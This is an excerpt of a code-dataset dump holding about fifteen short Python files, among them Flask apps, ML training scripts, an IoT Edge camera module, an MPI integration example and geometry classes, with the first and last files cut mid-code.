game_cmd_1P = self._process_cmd(cmd_received[self._ml_1P], self._ml_1P)\n game_cmd_2P = self._process_cmd(cmd_received[self._ml_2P], self._ml_2P)\n\n self._check_frame_delayed(0, self._ml_1P,\n scene_info[\"frame\"], game_cmd_1P[\"frame\"])\n self._check_frame_delayed(1, self._ml_2P,\n scene_info[\"frame\"], game_cmd_2P[\"frame\"])\n\n return game_cmd_1P[\"command\"], game_cmd_2P[\"command\"]\n\n def _process_cmd(self, cmd_received, ml_name):\n \"\"\"\n Check if the type of the command and the value are valid.\n Then return the validated command.\n \"\"\"\n error_msg = \"Received invalid command from '{}': %(reason)s\".format(ml_name)\n cmd_processed = {\"frame\": -1, \"command\": PlatformAction.NONE}\n\n # If it doesn't receive the command from the client, return the default one.\n if not cmd_received:\n return cmd_processed\n\n # Type checking and valie checking\n try:\n if not isinstance(cmd_received, dict):\n raise TypeError(\"the game command\", \"dict\")\n if not isinstance(cmd_received[\"frame\"], int):\n raise TypeError(\"'frame'\", \"int\")\n if not isinstance(cmd_received[\"command\"], str):\n raise TypeError(\"'command\", \"str\")\n\n cmd_processed[\"frame\"] = cmd_received[\"frame\"]\n cmd_processed[\"command\"] = PlatformAction(cmd_received[\"command\"])\n except KeyError as e:\n print(error_msg % {\"reason\": \"Missing {}\".format(e)})\n except TypeError as e:\n print(error_msg % {\"reason\":\n \"Wrong type of {}. Should be '{}'.\".format(*e.args)})\n except ValueError as e:\n print(error_msg % {\"reason\": str(e)})\n\n return cmd_processed\n\n def _check_frame_delayed(self, ml_index, ml_name, scene_frame, instruct_frame):\n \"\"\"\n Update the `frame_delayed` if the received instruction frame is delayed\n \"\"\"\n if (instruct_frame != -1 and\n scene_frame - instruct_frame > self._frame_delayed[ml_index]):\n self._frame_delayed[ml_index] = scene_frame - instruct_frame\n print(\"{} delayed {} frame(s)\"\n .format(ml_name, self._frame_delayed[ml_index]))\n\n def _game_over(self, status):\n if status == GameStatus.GAME_1P_WIN:\n self._score[0] += 1\n elif status == GameStatus.GAME_2P_WIN:\n self._score[1] += 1\n else: # Draw game\n self._score[0] += 1\n self._score[1] += 1\n\n return (self._score[0] == self._game_over_score or\n self._score[1] == self._game_over_score)\n\n def _print_result(self):\n if self._score[0] > self._score[1]:\n win_side = \"1P\"\n elif self._score[0] == self._score[1]:\n win_side = \"No one\"\n else:\n win_side = \"2P\"\n\n print(\"{} wins! Final score: {}-{}\".format(win_side, *self._score))\n","sub_path":"games/pingpong/game/pingpong_ml.py","file_name":"pingpong_ml.py","file_ext":"py","file_size_in_byte":5976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"411585932","text":"# This is from Python Crash Course from Chapter 8, exercise 13\r\n\r\n\r\ndef build_profile(first, last, **user_info):\r\n \"\"\"Build a dictionary containing everything we know about a user.\"\"\"\r\n profile = {}\r\n profile['first_name'] = first\r\n profile['last_name'] = last\r\n for key, value in user_info.items():\r\n profile[key] = value\r\n return profile\r\n\r\n\r\nbuild_profile('Sarah', 'G', hair_color='Blonde', pets='Dog', sex='woman')\r\n","sub_path":"pcc_ex8-13.py","file_name":"pcc_ex8-13.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"432028231","text":"import os\r\nfrom flask import Flask, jsonify, request\r\n\r\nimport json\r\nfrom prediction import predict\r\n\r\n\r\nHEADERS = {'Content-type': 'application/json', 'Accept': 'text/plain'}\r\n\r\ndef flask_app():\r\n app = Flask(__name__)\r\n\r\n\r\n @app.route('/healthz', methods=['GET'])\r\n def healthz():\r\n message = {\"status\": \"Aal is well!!!\"}\r\n response = jsonify(message)\r\n response.status_code = 200\r\n return response\r\n\r\n @app.route('/predict', methods=['POST'])\r\n def start():\r\n input_text = request.json\r\n return jsonify(predict(input_text['text']))\r\n return app\r\n\r\nif __name__ == '__main__':\r\n app = flask_app()\r\n app.run(debug=True, host='0.0.0.0', port=3000)\r\n","sub_path":"dyn-cust-feedback/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"101465196","text":"from flask import Flask,url_for,redirect,render_template,request,session\nfrom flask_sqlalchemy import SQLAlchemy\nfrom datetime import datetime\nfrom time import sleep\nimport pandas as pd\nimport numpy as np\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.model_selection import train_test_split\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport random\n\napp = Flask(__name__)\napp.secret_key = \"Priyansh\"\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///test.db'\napp.jinja_env.globals.update(isinstance=isinstance)\n\n@app.route('/')\ndef index():\n return redirect(url_for('Home'))\n\n@app.route('/Home')\ndef Home():\n return render_template(\"index.html\")\n\n@app.route('/base')\ndef base():\n return render_template(\"base.html\")\n\n@app.route('/tool' , methods=[\"GET\",\"POST\"])\ndef tool():\n\n if request.method == \"POST\":\n user_dict = {}\n current_sem = request.form['current_sem']\n #user_dict[\"Name\"] = request.form[\"name\"]\n user_dict[\"Current sem\"] = current_sem\n for i in range(1,int(current_sem)):\n temp_list = []\n temp_list.append(int(request.form[\"Attendance_\"+str(i)]))\n temp_list.append(int(request.form[\"Events_\"+str(i)]))\n temp_list.append(int(request.form[\"Sem_Percent_\"+str(i)]))\n user_dict[\"Sem \"+str(i)] = temp_list\n user_dict[\"Tech skills\"] = int(request.form[\"tech_skills\"])\n user_dict[\"Backlogs\"] = request.form[\"backlogs\"]\n\n backlogs = int(user_dict[\"Backlogs\"])\n backlogs_percentage = (backlogs * 100)/32\n final_backlog_percent = 100 - backlogs_percentage\n user_dict[\"Backlogs\"] = final_backlog_percent\n\n \n data = user_dict\n current_sem = int(data[\"Current sem\"])\n df=pd.DataFrame(data)\n train = df.drop([\"Current sem\"],axis=1)\n temp_list = []\n for i in range(1,current_sem):\n temp_list.append(\"Sem \"+str(i))\n print(train) \n test = df[temp_list]\n print(test)\n X_train,X_test,Y_train,Y_test = train_test_split(train,test,test_size=0.3,random_state=2)\n regr = LinearRegression()\n regr.fit(X_train,Y_train)\n pred = regr.predict(X_test)\n pred=np.average(pred)\n pred = int(pred)\n CGPA = pred/10+0.5\n\n #Data Visualization\n counter=int(data[\"Current sem\"])\n list1=[]\n for i in range(1,counter):\n list1.append(data[\"Sem \"+str(i)])\n a=list1\n new_dict = {key:val for key, val in data.items() if key not in ('Current sem','Tech skills','Backlogs') } \n xaxis = list(new_dict.keys()) # semester values and keys\n new_dict_1 = {key:val for key, val in data.items() if key == 'Current sem'} \n new_dict_1 = list(new_dict_1.keys())\n xaxis.append(new_dict_1[0])\n xaxis_att = list(new_dict.keys())\n list2=[] #converted attendance into a list\n for i in range(0,counter-1):\n list2.append(list1[i][0])\n\n list3=[]\n for i in range(0,counter-1):\n list3.append(list1[i][2])\n \n predicted_score = pred\n list3.append(predicted_score)\n print(list3)\n\n random_number = str(random.randint(0,1000))\n\n #Creating a bar graph from the filtered data\n\n fig = plt.figure(figsize = (6, 4)) \n colors = []\n bar_chart = dict(zip(xaxis, list3)) \n for key, val in bar_chart.items(): \n if key == 'Current sem':\n colors.append('red')\n else:\n colors.append('blue')\n\n # creating the bar plot for grades\n plt.bar(bar_chart.keys(), bar_chart.values(), color = colors,width = 0.3) \n \n plt.xlabel(\"Semester\") \n plt.ylabel(\"semester percentage(%)\") \n plt.title(\"Students percentages(%) by Semester\") \n plt.savefig(\"static/images/Graphs/Grade_Bar_graph_\"+random_number+\".png\")\n\n #Grade rise according to semesters\n '''b = sns.kdeplot(list3, shade=True)\n b.axes.set_title('Grade rise according to semesters', fontsize = 15)\n b.set_xlabel('Grade', fontsize = 20)\n b.set_ylabel('Count', fontsize = 20)\n grade_rise_fig = b.get_figure()\n grade_rise_fig.savefig(\"static/images/Graphs/Grade_rise_\"+random_number+\".png\")'''\n\n # creating the bar plot for attendance\n\n fig = plt.figure(figsize = (6, 4)) \n plt.bar(xaxis_att, list2, color ='blue', width = 0.3) \n plt.xlabel(\"Semester\") \n plt.ylabel(\"Attendance(%)\") \n plt.title(\"Students Attendance(%) by Semester\") \n plt.savefig(\"static/images/Graphs/Attendance_Bar_graph_\"+random_number+\".png\")\n\n #Filtering the data to be passed. Doesn't affect the prediction\n if(user_dict[\"Tech skills\"]==1):\n user_dict[\"Tech skills\"]=\"Yes\"\n elif(user_dict[\"Tech skills\"]==-1):\n user_dict[\"Tech skills\"]=\"No\"\n user_dict[\"Backlogs\"]=request.form[\"backlogs\"]\n\n return render_template(\"result.html\" , data = user_dict , final_grade = pred , CGPA=CGPA, Grade_bar_graph = \"static/images/Graphs/Grade_Bar_graph_\"+random_number+\".png\" , Attendance_bar_graph=\"static/images/Graphs/Attendance_Bar_graph_\"+random_number+\".png\")\n else:\n return render_template(\"form.html\")\n\nif __name__ == '__main__':\n app.run(debug = True)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"498594332","text":"from waitress import serve\nfrom pyramid.paster import get_app, setup_logging\nimport os, argparse\n\n# ======================================================================================================================\n\n# check and fill missing environment variables.\n# ones with None are optional.\nenvironmental = dict(PROTEIN_DATA='../protein-data',\n SECRETCODE='ERROR',\n SQL_URL='sqlite:///demo.db',\n MICHELANGLO_URL='localhost:8088',\n VENUS_URL='localhost:8088/venus',\n SENTRY_DNS_MICHELANGLO=None,\n PUPPETEER_CHROME=None, # will crash puppetter\n SLACK_WEBHOOK=None,\n ADMIN_EMAIL=None,\n SERVER_EMAIL=None,\n )\n\nfor ev in environmental:\n if ev in os.environ:\n print(f'Environment variable {ev}: present')\n elif environmental[ev] is None:\n print(f'Environment variable {ev}: skipping')\n else:\n print(f'Environment variable {ev}: defaulting to {environmental[ev]}')\n os.environ[ev] = environmental[ev]\n\n# ======================================================================================================================\n\n# custom `app.py` due to os.environs...\nparser = argparse.ArgumentParser()\nparser.add_argument('--d', action='store_true', help='run in dev mode')\nif parser.parse_args().d:\n print('*'*10)\n print('RUNNING IN DEV MODE')\n print('*' * 10)\n configfile = 'development.ini'\nelse:\n configfile = 'production.ini'\n\n# ======================================================================================================================\n\nsetup_logging(configfile)\napp = get_app(configfile, 'main', options={'SQL_URL': os.environ['SQL_URL']}) #pyramid.router.Router\n\n# ======================================================================================================================\n\nif __name__ == '__main__':\n serve(app, host='0.0.0.0', port=8088, threads=50)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"239402264","text":"import os\r\nimport cv2\r\nimport numpy as np\r\nimport xml.etree.ElementTree as ET\r\npath = \"/media/ubuntu/harddisk1/data/annotations/general/xml\"\r\nfiles = [x for x in os.listdir(path) if x.endswith('.xml')]\r\nfilePath = []\r\nobjects_set=set()\r\nbox_num = 0\r\nfor filename in files:\r\n filePath.append(path +'/'+ filename)\r\nfor fileEverPath in filePath:\r\n try:\r\n tree = ET.parse(fileEverPath)\r\n root = tree.getroot()\r\n img_name = root.find('filename').text\r\n objects = root.findall('object')\r\n box_num += len(objects)\r\n for object in objects:\r\n obj_name = object.find('name').text\r\n objects_set.add(obj_name)\r\n except Exception as err:\r\n os.remove(fileEverPath)\r\n print(fileEverPath+' deleted')\r\n\r\nprint(objects_set)\r\nprint(len(objects_set))\r\nprint(box_num)\r\n","sub_path":"data_tools/统计所有的种类.py","file_name":"统计所有的种类.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"462982079","text":"from mongokit import *\nimport time\n\nclass Adress(Document):\n structure = {\n 'id' : int,\n 'name' : unicode,\n 'street' : unicode,\n 'city' : unicode,\n 'zip' : unicode,\n }\n ski_validation = True\n\n\ndef CalTime():\n connection = Connection() \n connection.register([Adress])\n \n for i in range(100000):\n addr = connection.foo.foo.Adress()\n addr['name'] = u'Andreas Jung'\n addr['street'] = u'xxxxxxxxxxxxx'\n addr['city'] = u'xxxxxx'\n addr['zip'] = u'72070'\n addr.save()\n\n#if __name__ == \"__main__\":\n# start = time.time()\n# CalTime()\n# elapsed = (time.time() - start)\n# print elapsed\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"mapreduce.py","file_name":"mapreduce.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"177474822","text":"from sklearn.svm import SVR\n\nfrom src.config import PP_DICT, FULL_DATA_DICT\nfrom src.model.utils import train_test_model\n\n# Optimal GS Params\nparams = {'C': 1,\n 'epsilon': 0.2,\n 'kernel': 'rbf',\n 'shrinking': True,\n 'tol': 0.001}\n\npp_dict = PP_DICT\ndata_dict = FULL_DATA_DICT\n\npipeline, m_err, r2 = train_test_model(SVR(), params, data_dict, pp_dict, save_model=True)\n","sub_path":"src/model/svr.py","file_name":"svr.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"591917255","text":"#\n# CAMP\n#\n# Copyright (C) 2017, 2018 SINTEF Digital\n# All rights reserved.\n#\n# This software may be modified and distributed under the terms\n# of the MIT license. See the LICENSE file for details.\n#\n\n\n\nfrom unittest import TestCase\n\nfrom camp.commands import Command, Execute\n\n\n\nclass LongOptionsAreAccepted(TestCase):\n\n def test_given_a_configuration_file(self):\n command_line = [\"execute\", \"--config\", \"config.yml\"]\n\n command = Command.extract_from(command_line)\n\n self.assertIsInstance(command, Execute)\n self.assertEqual(\"config.yml\",\n command.configuration_file)\n\n\n \nclass ShortOptionsAreAccepted(TestCase):\n\n def test_given_a_configuration_file(self):\n command_line = [\"execute\", \"-c\", \"config.yml\"]\n\n command = Command.extract_from(command_line)\n\n self.assertIsInstance(command, Execute)\n self.assertEqual(\"config.yml\",\n command.configuration_file)\n\n\n\nclass DefaultValuesAreCorrect(TestCase):\n\n def test_when_no_argument_is_given(self):\n command_line = [\"execute\"]\n\n command = Command.extract_from(command_line)\n\n self.assertIsInstance(command, Execute)\n self.assertEqual(Execute.DEFAULT_CONFIGURATION_FILE,\n command.configuration_file)\n","sub_path":"tests/commands/test_execute.py","file_name":"test_execute.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"372012444","text":"from django.views.generic import ListView\n\nfrom .user_cf import UserBasedCF\nfrom .item_cf import ItemBasedCF\nfrom products.models import Product\n\n\nclass UserBasedRecommendationView(ListView):\n template_name = 'recommendations/list.html'\n\n def get_context_data(self, *args, **kwargs):\n context = super(UserBasedRecommendationView, self).get_context_data(*args, **kwargs)\n return context\n\n def get_queryset(self, *args, **kwargs):\n request = self.request\n user = request.user\n user_based_cf = UserBasedCF()\n recommendations = user_based_cf.recommend(user)\n ids = [item[0] for item in recommendations]\n return Product.objects.filter(id__in=ids)\n\n\nclass ItemBasedRecommendationView(ListView):\n template_name = 'recommendations/list.html'\n\n def get_context_data(self, *args, **kwargs):\n context = super(ItemBasedRecommendationView, self).get_context_data(*args, **kwargs)\n return context\n\n def get_queryset(self, *args, **kwargs):\n request = self.request\n user = request.user\n item_based_cf = ItemBasedCF()\n recommendations = item_based_cf.recommend(user)\n ids = [item[0] for item in recommendations]\n return Product.objects.filter(id__in=ids)\n\n\nclass UserItemRecommendationView(ListView):\n template_name = 'recommendations/list.html'\n\n def get_context_data(self, *args, **kwargs):\n context = super(UserItemRecommendationView, self).get_context_data(*args, **kwargs)\n return context\n\n def get_queryset(self, *args, **kwargs):\n request = self.request\n user = request.user\n\n user_based_cf = UserBasedCF()\n user_based_recommendations = user_based_cf.recommend(user)\n user_based_ids = [item[0] for item in user_based_recommendations]\n\n item_based_cf = ItemBasedCF()\n item_based_recommendations = item_based_cf.recommend(user)\n item_based_ids = [item[0] for item in item_based_recommendations]\n\n ids = list(set(user_based_ids) | set(item_based_ids))\n return Product.objects.filter(id__in=ids)\n","sub_path":"src/recommendations/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"208230153","text":"# 定义函数\nfrom flask import session,current_app,g\nfrom info.models import User\nfrom functools import wraps\n\n\ndef do_rank(index):\n '''根据索引,返回first,second,third'''\n if index == 1:\n return 'first'\n elif index == 2:\n return 'second'\n elif index == 3:\n return 'third'\n else:\n return ''\n\n# view_func == news_detail\ndef user_login_data(view_func):\n \"\"\"自定义装饰器获取登录用户信息\n 特点:装饰器会修改被装饰的函数的__name__属性,改成wrapper\n \"\"\"\n\n # **kwargs == {\"news_id\":1}\n # 还原装饰器修改后的__name__,还有被装饰的函数中的描述信息\n @wraps(view_func)\n def wrapper(*args, **kwargs):\n # 具体获取user_id,使用user_id查询user信息\n user_id = session.get('user_id', None)\n user = None\n if user_id:\n # 如果有user_id,说明登录中,就取出User模型对象信息\n try:\n user = User.query.get(user_id)\n except Exception as e:\n current_app.logger.error(e)\n\n # 使用g变量,将查询到的用户user信息存储,在视图函数中可以再次使用g变量读取\n g.user = user\n\n # 调用被装饰器的函数**kwargs == {\"news_id\":1}\n return view_func(*args, **kwargs)\n\n return wrapper\n\n\n\n# def user_login_data():\n# user_id = session.get('user_id')\n# user = None\n# try:\n# user = User.query.get(user_id)\n# except Exception as e:\n# current_app.logger.error(e)\n# return user","sub_path":"info/utils/comment.py","file_name":"comment.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"652954878","text":"# Assignment 7.2: Write a program that prompts for a file name, then opens that file and reads through the file,\n# looking for lines of the form: X-DSPAM-Confidence: 0.8475\n# Count these lines and extract the floating point values from each of the lines and compute the average of those values\n# and produce an output as shown below.\n\n# Use the file name mbox-short.txt as the file name\nfname = input(\"Enter file name: \")\nfhand = open(fname)\n\ntotal = 0\ncount = 0\n\nfor line in fhand:\n if line.startswith(\"X-DSPAM-Confidence:\"):\n col = line.find(\":\")\n substr = line[col+1:]\n substr = substr.lstrip()\n num = float(substr)\n total = total + num\n count = count + 1\n\naverage = total / count\n\nprint(\"Average spam confidence:\", average)\n\n\n\n\n","sub_path":"Assignment_7.2.py","file_name":"Assignment_7.2.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"139556297","text":"\n# coding: utf-8\n\n# In[17]:\n\n\nimport subprocess\n#subprocess.run(['jupyter', 'nbconvert',\n# '--to', 'python', 'Constants.ipynb'])\n\n#initial value\nN_GENE = 8 # The number of genes.\nN_IND = 300 # The number of individuals in a population.\nCXPB = 0.5 # The probability of crossover. 交叉確率\nMUTPB = 0.2 # The probability of individdual mutation. 個体突然変異確率\nMUTINDPB = 0.05 # The probability of gene mutation. 遺伝子突然変異確率\nN_GEN = 40 # The number of generation loop.\n\nALPHA = 0.3 #The constants in BLX-α crossover function.\n\nTRADE_TYPE = 1 #0: onlyLong, 1: LongShort.\nTRADE_NUM = 150 #The constants to determine the number of trade. #最低n日に一回取引する\n","sub_path":"Constants.py","file_name":"Constants.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"582462303","text":"\n\n#calss header\nclass _SYPHILIS():\n\tdef __init__(self,): \n\t\tself.name = \"SYPHILIS\"\n\t\tself.definitions = [u'a disease caught during sexual activity with an infected person. Syphilis spreads slowly from the sex organs to all parts of the body and often results in death if not treated.']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_syphilis.py","file_name":"_syphilis.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"322453432","text":"# Copyright (c) Microsoft. All rights reserved.\n# Licensed under the MIT license. See LICENSE file in the project root for\n# full license information.\n\nimport random\nimport os\nimport time\nimport sys\nimport iothub_client\nfrom iothub_client import IoTHubModuleClient, IoTHubClientError, IoTHubTransportProvider\nfrom iothub_client import IoTHubMessage, IoTHubMessageDispositionResult, IoTHubError\nimport cv2\nfrom cv2 import cv2\nimport requests\nimport json\nimport imutils\nfrom imutils.video import VideoStream\nimport datetime\n\n# messageTimeout - the maximum time in milliseconds until a message times out.\n# The timeout period starts at IoTHubModuleClient.send_event_async.\n# By default, messages do not expire.\nMESSAGE_TIMEOUT = 10000\nSEND_CALLBACKS = 0\n\n# Choose HTTP, AMQP or MQTT as transport protocol. Currently only MQTT is supported.\nPROTOCOL = IoTHubTransportProvider.MQTT\n\n# Callback received when the message that we're forwarding is processed.\ndef send_confirmation_callback(message, result, user_context):\n global SEND_CALLBACKS\n #print ( \"Confirmation[%d] received for message with result = %s\" % (user_context, result) )\n map_properties = message.properties()\n key_value_pair = map_properties.get_internals()\n #print ( \" Properties: %s\" % key_value_pair )\n SEND_CALLBACKS += 1\n #print ( \" Total calls confirmed: %d\" % SEND_CALLBACKS )\n\ndef send_image(frame,classifier_url):\n \n headers = {'Content-Type': 'application/octet-stream'}\n\n imencoded = cv2.imencode('.jpg',frame)[1]\n try:\n response = requests.post(classifier_url, headers = headers, data = imencoded.tostring())\n prob, item = process_json(response)\n\n if prob > 0.8:\n return prob, item\n else:\n return 0, 'none'\n\n except Exception as e:\n return e\n\ndef process_json(output):\n max_probability = 0\n item = 'none'\n jsonres = output.json()\n for predict in jsonres['predictions']:\n if predict['probability'] > max_probability:\n max_probability = predict['probability']\n item = predict['tagName']\n \n return max_probability, item\n\ndef capture_image_send_message(video_src, classifier_url, hubManager):\n\n webcam = VideoStream(video_src).start()\n print(\"Taking camera from input %s\" % video_src)\n time.sleep(2)\n print(\"Camera initialized...\")\n\n while(True):\n image = webcam.read()\n d1 = datetime.datetime.now()\n try:\n prob, item = send_image(image,classifier_url)\n d2 = datetime.datetime.now()\n d = d2 - d1\n duration = int(round(d.seconds * 1000 + d.microseconds / 1000, 0))\n print(\"[%s ms] I see %s with %f confidence.\" % (duration, item, prob))\n\n except Exception as e:\n print('error')\n \n message = IoTHubMessage(str('test'))\n hubManager.forward_event_to_output(\"outputs\",message,0)\n time.sleep(0.01)\n\nclass HubManager(object):\n\n def __init__(\n self,\n protocol=IoTHubTransportProvider.MQTT):\n self.client_protocol = protocol\n self.client = IoTHubModuleClient()\n self.client.create_from_environment(protocol)\n\n # set the time until a message times out\n self.client.set_option(\"messageTimeout\", MESSAGE_TIMEOUT)\n\n # Forwards the message received onto the next stage in the process.\n def forward_event_to_output(self, outputQueueName, event, send_context):\n self.client.send_event_async(\n outputQueueName, event, send_confirmation_callback, send_context)\n\ndef main(protocol):\n try:\n print ( \"\\nPython %s\\n\" % sys.version )\n VIDEO_SOURCE = os.getenv('videosource',\"\")\n FACE_URL = os.getenv('classifierapi',\"\")\n\n hub_manager = HubManager(protocol)\n \n print ( \"Starting the IoT Hub Python Apps using protocol %s...\" % hub_manager.client_protocol )\n\n while True:\n capture_image_send_message(VIDEO_SOURCE,FACE_URL, hub_manager)\n time.sleep(1)\n\n except IoTHubError as iothub_error:\n print ( \"Unexpected error %s from IoTHub\" % iothub_error )\n return\n except KeyboardInterrupt:\n print ( \"IoTHubModuleClient sample stopped\" )\n\nif __name__ == '__main__':\n main(PROTOCOL)","sub_path":"Object Classification DevOps/modules/medium_camera/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"289166311","text":"from mpi4py import MPI\r\nimport time\r\n\r\ndef f(x):\r\n return x*x*x*x\r\n\r\ndef Trap(a,b,n,h):\r\n integral =((a) + f(b))/2.0\r\n\r\n x=a \r\n for i in range(1,int(n)):\r\n x = x+h ##1er loop del proceso 0 x=0,00097...\r\n integral = integral + f(x) ##1er loop del proceso 0 integral 0,027....\r\n \r\n return integral*h\r\n\r\ntic = time.perf_counter()\r\ncomm = MPI.COMM_WORLD #comunicación punto a punto\r\nmy_rank = comm.Get_rank()\r\np = comm.Get_size()\r\n\r\na=0.0\r\nb=1.0\r\nn=99999\r\ndest=0\r\ntotal=1.0\r\n\r\nh = (b-a)/n\r\nlocal_n = n/p\r\n\r\nlocal_a = a + my_rank*local_n*h\r\nlocal_b = local_a + local_n*h\r\nintegral = Trap(local_a, local_b, local_n, h)\r\n\r\nif my_rank == 0:\r\n total = integral\r\n for source in range (1,p):\r\n integral = comm.recv(source=source)\r\n print(\"Proceso \", my_rank, \"<-\", source, \",\", integral,\"\\n\")\r\n total = total + integral\r\n\r\n toc=time.perf_counter()\r\n\r\n print(f\"tiempo de ejecución: {toc - tic:0.4f} segundos\")\r\nelse:\r\n## print(\"Proceso \", my_rank, \"->\", dest, \",\", integral,\"\\n\")\r\n comm.send(integral, dest=0) \r\n\r\nif(my_rank == 0):\r\n print(\"Con n=\", n,\" trapezoides, \\n\")\r\n print(\"integral definida desde\", a, \"hasta\", b, \"=\", total,\"\\n\")\r\n\r\n","sub_path":"cluster/project/calcula.py","file_name":"calcula.py","file_ext":"py","file_size_in_byte":1210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"506130397","text":"class PolygonProjection:\n\tdef __init__(self, vertices, polygon, area_factor, *args, **kwargs):\n\t\tsuper().__init__(*args, **kwargs)\n\t\t\n\t\t\n\t\tself.__vertices = tuple(vertices)\n\t\tself.__polygon = polygon\n\t\tself.__area_factor = area_factor\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t@property\n\tdef vertices(self):\n\t\treturn self.__vertices\n\t\t\n\t\t\n\t\t\n\t@property\n\tdef polygon(self):\n\t\treturn self.__polygon\n\t\t\n\t\t\n\t\t\n\t@property\n\tdef area_factor(self):\n\t\treturn self.__area_factor\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t@property\n\tdef area(self):\n\t\tarea = self.__area_factor * self.projection_area\n\t\t\n\t\treturn area\n\t\t\n\t\t\n\t\t\n\t@property\n\tdef projection_area(self):\n\t\tfirst_length = abs(self.__vertices[1] - self.__vertices[0])\n\t\tsecond_length = abs(self.__vertices[2] - self.__vertices[1])\n\t\tthird_length = abs(self.__vertices[0] - self.__vertices[2])\n\t\t\n\t\thalf_perimeter = (first_length + second_length + third_length) / 2\n\t\t\n\t\tprojection_area_square = \\\n\t\t\thalf_perimeter \\\n\t\t\t\t* (half_perimeter - first_length) \\\n\t\t\t\t* (half_perimeter - second_length) \\\n\t\t\t\t* (half_perimeter - third_length)\n\t\t\t\t\n\t\t#!!!!! Подумать как сделать лучше. Вероятно из-за ошибки вычислений\n\t\t#!!!!! может оказаться, что квадрат площади отрицателен (когда одна\n\t\t#!!!!! из сторон мала)\n\t\tif projection_area_square <= 0:\n\t\t\tprojection_area = 0\n\t\telse:\n\t\t\tprojection_area = projection_area_square ** 0.5\n\t\t\t\n\t\treturn projection_area\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\nclass Polygon:\n\tdef __init__(self, vertices, penalty, impassability, *args, **kwargs):\n\t\tsuper().__init__(*args, **kwargs)\n\t\t\n\t\t\n\t\tself.__vertices = tuple(vertices)\n\t\tself.__penalty = penalty\n\t\tself.__impassability = impassability\n\t\t\n\t\t\n\t\t\n\t\tfirst_vector = \\\n\t\t\t[first_coordinate - second_coordinate \\\n\t\t\t\tfor first_coordinate, second_coordinate \\\n\t\t\t\tin zip(self.__vertices[1], self.__vertices[0])]\n\t\t\t\t\n\t\tsecond_vector = \\\n\t\t\t[first_coordinate - second_coordinate \\\n\t\t\t\tfor first_coordinate, second_coordinate \\\n\t\t\t\tin zip(self.__vertices[2], self.__vertices[1])]\n\t\t\t\t\n\t\tthird_vector = \\\n\t\t\t[first_coordinate - second_coordinate \\\n\t\t\t\tfor first_coordinate, second_coordinate \\\n\t\t\t\tin zip(self.__vertices[0], self.__vertices[2])]\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t\n\t\tself.__normal = [\n\t\t\tfirst_vector[1] * second_vector[2] \\\n\t\t\t\t- first_vector[2] * second_vector[1],\n\t\t\tfirst_vector[2] * second_vector[0] \\\n\t\t\t\t- first_vector[0] * second_vector[2],\n\t\t\tfirst_vector[0] * second_vector[1] \\\n\t\t\t\t- first_vector[1] * second_vector[0]\n\t\t]\n\t\t\n\t\tif self.__normal[2] < 0:\n\t\t\tself.__normal = [- coordinate for coordinate in self.__normal]\n\t\telif self.__normal[2] == 0:\n\t\t\traise Exception() #!!!!!\n\t\t\t\n\t\tnormal_length = \\\n\t\t\tsum([coordinate ** 2.0 for coordinate in self.__normal]) ** 0.5\n\t\t\t\n\t\tself.__normal = \\\n\t\t\t[coordinate / normal_length for coordinate \\\n\t\t\t\tin self.__normal]\n\t\t\t\t\n\t\tself.__normal = tuple(self.__normal)\n\t\t\n\t\t\n\t\t\n\t\tfirst_length = \\\n\t\t\tsum([coordinate ** 2.0 for coordinate in first_vector]) ** 0.5\n\t\t\t\n\t\tsecond_length = \\\n\t\t\tsum([coordinate ** 2.0 for coordinate in second_vector]) ** 0.5\n\t\t\t\n\t\tthird_length = 